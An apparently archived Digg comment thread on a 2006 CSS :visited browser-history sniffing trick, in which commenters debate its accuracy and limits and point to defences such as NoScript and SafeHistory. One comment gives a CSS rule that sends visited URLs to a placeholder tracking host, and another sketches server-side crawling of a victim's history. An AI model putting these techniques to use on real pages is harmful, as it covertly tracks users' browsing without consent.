What is Digg?Warning: The Content in this Article May be Inaccurate
Readers have reported that this story contains information that may not be accurate.157 Comments
- Dakana, on 10/12/2007, -3/+48Buried as inaccurate.
It doesn't search your history; it checks to see if you've been to the listed sites. - radiofrequency, on 10/12/2007, -6/+48That's frikkin' genius. He's writing links to popular websites in the document and checking to see if the links are the color of a visited link. I wish I were that cutting edge.
- stratedge, on 10/12/2007, -3/+40It's a neat trick, but the title of both this and the original article are totally misleading. It's not reading your history, it's just testing if you've been to any of a list of web sites. HUGE DIFFERENCE. For me, using firefox, it did not find any sites I had been to.
Again, I don't deny that it's neat, but it's not nearly as good an 'exploit' as the author claims with his title. - sepi, on 10/12/2007, -5/+38a direct link to the _javascript_ trick (bypassing the blog link):
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html - nevenmrgan, on 10/12/2007, -3/+25Wow. According to this groundbreaking tool, I've been to
http://www.google.com/
Ya think? - ccanni1028, on 10/12/2007, -3/+25"but I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Where have you been living? Unless the update is CRITICAL to them (and not even always then), it won't be relased until the second Tuesday of the month, when they do their bulk Windows Update release. - DerGeist, on 10/12/2007, -0/+20IE7 RC1 doesn't "block" the site, the Javascript is written to only perform the so-called "exploit" (and I use the term loosely) on mozilla-based browsers.
IE7 would be just as susceptible. - doctornkul, on 10/12/2007, -1/+20The downside of the trick is that it'll only show a site if you went to the root of the site (didn't name any files or folders). This means that the exploit won't register:
1) Many google searches (and therefore searches typed into the address bar) that automatically link to a non-root page
2) Most links that you follow - chances are that they won't link to amazon.com, but rather something like amazon.com/exec/obiodo..., which won't be registered. None of the digg links you follow will be registered.
Basically the only websites it will register are the ones you type into the address bar and those with google search results pointing to the root. That leaves a very large hole, especially for people who surf like me, typing website names into the address bar instead of actually typing .com every time, and actually jumping from website to website more frequently through links than through typing the address.
Also, the algorithm is also very inefficient. For one it needs to try each and every one of the websites that it's looking for, which may mean thousands or more if it wants to be complete. This, however, means that if a website is not in its database, it won't find it. And I won't even go into how bad searching for all permutations is. The good side for the exploiter is that it all happens on the client computer, so it's not so CPU-intensive for them.
I would say that this "exploit" is roughly as serious as a tracking cookie when used realistically, and the best way to avoid this is to simply not allow CSS to look at link colors (by this I mean that the standards should be changed). I'm more of a programmer than a web developer, but I don't think that the ability to look at link colors are very neccesary. Perhaps somebody more experienced can tell me why web developers need that feature. - gordonchiam, on 10/12/2007, -10/+28very clever trick
- kimos, on 10/12/2007, -0/+18Amazes me that people still can't figure out the difference between Java and JavaScript...
- Prometheus, on 10/12/2007, -2/+19It knows I've been to google.com! That narrows down my identity!
- MajorD, on 10/12/2007, -2/+18"You have not been to http://www.digg.com/"
hmm. - merreborn, on 10/12/2007, -0/+14When this got frontpaged a couple days ago, someone pointed out there's been a bug report on this in Mozilla's bug database since 2002.
- weird0science, on 10/12/2007, -4/+18I use NOSCRIPT extension. Stops this type of thing from happening.
https://addons.mozilla.org/firefox/722/ - inactive, on 10/12/2007, -2/+16I agree, clever, but the title is misleading. I thought it wasn gonna hack into your chrome:// somehow, not just be a list of popular sites.
- ilovenicotine, on 10/12/2007, -0/+12SafeHistory
https://addons.mozilla.org/firefox/1502/
Makes it so websites only see the history from their domain - MrViklund, on 10/12/2007, -6/+17@Pkkid
"I strongly think that MS is great because they are VERY fast at releasing code fixes and updates."
Haha are you joking? - Markie1006, on 10/12/2007, -2/+11it's not really accessing the history as such, just checking against it's own 'known list'.
If you have something in your history that is not in the known list, it won't appear.
i.e. I have a ton of entries in my history, and it only managed to show one - slashdot.
Marked as inaccurate AND a dupe. (if only I could). - Daiken, on 10/12/2007, -5/+14lol, how stupid. Nothing came up for me. Marked as inaccurate.
- tehJR, on 10/12/2007, -2/+11and I've been to www.cnn.com
Alert the internets... - scottschiller, on 10/12/2007, -0/+8Just to play devil's advocate here, you could do something like
a:visited {
background-image:url(http://whatever/track.php?url=someURLHere);
}
.. You'd have to disable CSS, regrettably, for that one to be blocked. ;) - iNoles, on 10/12/2007, -5/+13I try it in Bon Echo Beta 2, its show nothing to display.
Marked as inaccurate. - crazaalex, on 10/12/2007, -7/+15Won't work if you have noscript extension.
- nofxjunkee, on 10/12/2007, -0/+8No, bookmarks are for saving certain sites you're sure you want to read again in the future. The history is for when you go "oh *****, now which one of the sites I 100 visited in the last few days was this specific piece of information on?"
- cryptoknight, on 10/12/2007, -3/+11I have browser history set to 0 in my firefox settings and this site finds no history for me. why do you need browser history anyways isnt that what bookmarks are for?
- tizz66, on 10/12/2007, -11/+18It's not really a browser hack anyway, it's more a standards hack. Ironically IE isn't affected (by this code anyway, not including ports) because it doesn't support the standard properly.
- ccanni1028, on 10/12/2007, -3/+10I don't have my history saved. It stops things like this from happening.
- CedEx, on 10/12/2007, -1/+8It's really going to suck for him if I don't visit any of those sites he's painstakingly typed into his code.
- 0siris, on 10/12/2007, -5/+12No it doesnt... millions of people every day use google across the countr-...
wait, you were kidding...
I knew that.
Carry On. - PolyVector, on 10/12/2007, -1/+8of course it doesn't work in IE... didn't anybody notice the "if (is_mozilla)" line? maybe I'm missing something here?
- kimos, on 10/12/2007, -2/+8@ilovenicotine
Sorry, I didn't quite catch what you said.
What about exploiting your ass? - Markie1006, on 10/12/2007, -6/+12I would help you out and send the internet to you on a disk, but I think the tubes are clogged on my end.
- ghostbyte, on 10/12/2007, -0/+6:visited support allows queries into global history
Posted 2002-05-28 This has been around for a long time.
https://bugzilla.mozilla.org/show_bug.cgi?id=147777 - nofxjunkee, on 10/12/2007, -0/+6It does in FF 2 beta 1 here on my Mac.
- NiLeS, on 10/12/2007, -0/+6@ doctornkul :
Chaging link colors are useful if I change the text background. When I have a blue background, I still want you to see the links, say by changing from blue to white. - br0ck, on 10/12/2007, -1/+7@MajorD - Look up in your address bar and notice you are NOT at WWW.digg.com. Try http://digg.com ... worked for me.
- mc7winkie, on 10/12/2007, -5/+11Stop post spamming. Period.
- duodave, on 10/12/2007, -1/+6I'm not impressed. Now, if he had somehow linked this to a DNS server, then I'd be impressed. As it is, it only showed my four sites I'd visited, and very common ones at that.
- SweetsGreen, on 10/12/2007, -4/+9so all I'd have to do is modify the websites[] array to contain every site every and I'd have somthing usefull.
- nicerobot, on 10/12/2007, -0/+5How about an extension of this technique. If it finds sites in your history, send them to the server (hurray for AJAX), the server can get all the links from the page, send the links back to the client and process them the same way. Now it can crawl your history.
- SteelChicken, on 10/12/2007, -1/+6agreed. if it doesn't scan for a particular URL, it won't show up.
a neat hack, but hardly awe-inspiring. - LuTze, on 10/12/2007, -0/+5The summary is misleading and inaccurate. The hack had not been ported to work on IE. If you read the comments below on
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
There is a working port for IE, which "picks up the history" from IE7RC1. Not really a case about IE7RC1 being "smart". - Moskie, on 10/12/2007, -0/+5how would you actually populate the 'someURLHere' value?
- br0ck, on 10/12/2007, -1/+6@mojaam - noscript let's you whitelist sites to allow javascript one time or permanently.
- loneBoat, on 10/12/2007, -1/+6Heh-heh. I have FF set to clear my cache every time I close it, so when I tried it, it said:
"I know where you've been: www.google.com"
Google is my homepage, so whoo boy, I'm really scared now! You know I've been to google.com!
Okay, bury me. I just thought it was funny... - Otto, on 10/12/2007, -0/+5doctornkul: As a proof of concept though, it's still interesting. Basically he's not checking the history at all, he's creating a hidden table with links to all the sites, and setting a visited style on each one with a different color, then checking for colors of the resulting hidden links. Slow, yes, but it might get somebody else thinking and find a real hole there.
- Izzie, on 10/12/2007, -1/+5IE *is* affected too
http://www.gnucitizen.org/projects/javascript-visited-link-scanner/
http://icant.co.uk/sandbox/nickhistory.html - Splitt3rxx, on 10/12/2007, -1/+5I take back what is said, how ***** ironic
http://img.photobucket.com/albums/v116/guinea_pig_slave/operacrash5.png - krinthekuz, on 09/16/2008, -1/+51) this is a dupe of 2 recent front page articles of the exact same exploit (why the 2nd of the 2 didnt get called out as a dupe is beyond me)
http://www.digg.com/programming/A_New_Way_of_Tracking_Users_Browsing_Habits
http://digg.com/security/I_Know_Where_You_ve_Been_a_Firefox_CSS_browsing_history_exploit
when some people have pointed this out, you guys downranked them. wtf is wrong with you idiots? (if you didnt downrank them, this is not aimed at you)
2) as pointed out in the other thread, this exploit doesn't even work on a default installation of firefox 1.5. do you guys who digg ***** like this even check to see if it works?
seriously, over the last few days, my impression of the digg swarm has gone down massively. you're embarassing to the community. - inactive, on 10/12/2007, -1/+5Yes, apparently what we're missing is an obfuscated attempt to discredit FF....
-
Show 51 - 100 of 157 discussions
Digg is coming to a city (and computer) near you! Check out all the details on our 
© Digg Inc. 2009
— Content created and posted by Digg users is 